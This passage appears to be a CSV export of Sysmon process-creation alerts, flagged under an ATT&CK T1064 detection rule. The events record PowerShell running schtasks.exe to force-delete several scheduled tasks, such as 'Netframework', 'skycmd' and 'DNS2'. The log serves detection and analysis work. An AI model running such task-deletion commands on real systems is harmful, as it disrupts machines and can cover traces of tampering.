Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.650",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.796 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001060212700} +ProcessId: 2652 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.798220800Z"",""eventRecordID"":""3070"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.796\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001060212700}\r\nProcessId: 2652\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.796"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001060212700}"",""processId"":""2652"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.624",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.769 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a11f2700} +ProcessId: 7484 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.772046400Z"",""eventRecordID"":""3069"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.769\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a11f2700}\r\nProcessId: 7484\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.769"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010a11f2700}"",""processId"":""7484"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.603",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.740 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f81d2700} +ProcessId: 6864 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.743485700Z"",""eventRecordID"":""3068"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.740\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f81d2700}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.740"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010f81d2700}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:19:29.589",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.700 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010cf1b2700} +ProcessId: 7940 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.702370100Z"",""eventRecordID"":""3067"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.700\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010cf1b2700}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.700"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010cf1b2700}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.572",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.651 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010091a2700} +ProcessId: 7780 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.654260400Z"",""eventRecordID"":""3066"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.651\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010091a2700}\r\nProcessId: 7780\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.651"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010091a2700}"",""processId"":""7780"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.541",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.612 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b182700} +ProcessId: 5996 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.633290900Z"",""eventRecordID"":""3065"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.612\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00107b182700}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:01.612"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00107b182700}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 